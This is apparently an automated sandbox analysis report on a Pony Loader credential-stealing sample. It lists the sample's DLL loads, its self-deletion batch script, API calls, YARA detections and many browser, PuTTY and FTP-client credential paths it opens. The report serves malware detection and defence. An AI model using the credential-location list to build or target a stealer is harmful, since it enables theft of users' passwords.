            Source: C:\Users\user\Desktop\2qsdqACnX3.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5990015.bat" "C:\Users\user\Desktop\2qsdqACnX3.exe" "Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: msi.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040F9DE GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,0_2_0040F9DE

            Hooking and other Techniques for Hiding and Protection

            barindex
            Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile dump: 5990015.bat.0.dr 3880EEB1C736D853EB13B44898B718ABJump to dropped file
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-10603
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_00403DC3 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,0_2_00403DC3
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_00404E00 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,0_2_00404E00
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_004086C7 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,0_2_004086C7
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_00404A90 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,0_2_00404A90
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_00409414 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,0_2_00409414
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_00408543 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,0_2_00408543
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040421A GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_0040421A
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: 2qsdqACnX3.exe, 00000000.00000002.2034670536.0000000000711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt3d
            Source: 2qsdqACnX3.exe, 00000000.00000002.2034670536.0000000000711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: 2qsdqACnX3.exe, 00000000.00000002.2034670536.0000000000711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeAPI call chain: ExitProcess graph end nodegraph_0-7525
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040F9DE GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,0_2_0040F9DE
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040F566 mov eax, dword ptr fs:[00000030h]0_2_0040F566
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040FF45 SetUnhandledExceptionFilter,RevertToSelf,0_2_0040FF45
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040FCA6 lstrcmpiA,LogonUserA,lstrlen,LCMapStringA,LogonUserA,LogonUserA,746D1B10,ImpersonateLoggedOnUser,RevertToSelf,746C5030,CloseHandle,0_2_0040FCA6
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5990015.bat" "C:\Users\user\Desktop\2qsdqACnX3.exe" "Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_004040EF AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_004040EF
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_0040421A
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040FE97 OleInitialize,GetUserNameA,0_2_0040FE97
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040421A GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_0040421A

            Stealing of Sensitive Information

            barindex
            Yara detected Pony
            Source: Yara matchFile source: 2qsdqACnX3.exe, type: SAMPLE
            Source: Yara matchFile source: 0.2.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 2qsdqACnX3.exe PID: 6632, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings.ccsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\SiteDesigner\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\History.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqliteJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\SharedSettings_1_0_5.ccsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbarJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\SmartFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\RhinoSoft.com\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbarJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\SharedSettings.ccsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: HKEY_CURRENT_USER\Software\TurboFTPJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\BlazeFtp\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBITJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\LeapWare\LeapFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\GPSoftware\Directory Opus\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: HKEY_CURRENT_USER\Software\AceBITJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\NetSarang\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\FTPInfo\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.iniJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\FileZilla\filezilla.xmlJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.iniJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\RhinoSoft.com\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\SharedSettings_1_0_5.sqliteJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqliteJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Program Files (x86)\CuteFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\SharedSettings.ccsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\GHISLER\wcx_ftp.iniJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\BlazeFtp\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.jsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\FlashFXP\4\Sites.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\INSoftware\NovaFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\FTP Explorer\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\FTPGetter\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Program Files (x86)\CuteFTP\sm.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\FTPInfo\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xmlJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\FTP Explorer\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\CuteFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTPJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\SmartFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\sm.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: HKEY_CURRENT_USER\Software\FTP Explorer\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\Frigate3\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\SetupJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\FileZilla\sitemanager.xmlJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqliteJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\TurboFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\Frigate3\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\FTPRush\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\FTPGetter\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\FlashFXP\3\Quick.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\Estsoft\ALFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\ExpanDrive\drives.jsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\ExpanDrive\drives.jsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\CuteFTP\sm.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\TurboFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\AceBIT\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\TurboFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\BlazeFtp\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\SharedSettings.sqliteJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\FlashFXP\3\Sites.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbarJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbarJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\SharedSettings.sqliteJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\AceBIT\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqliteJump to behavior
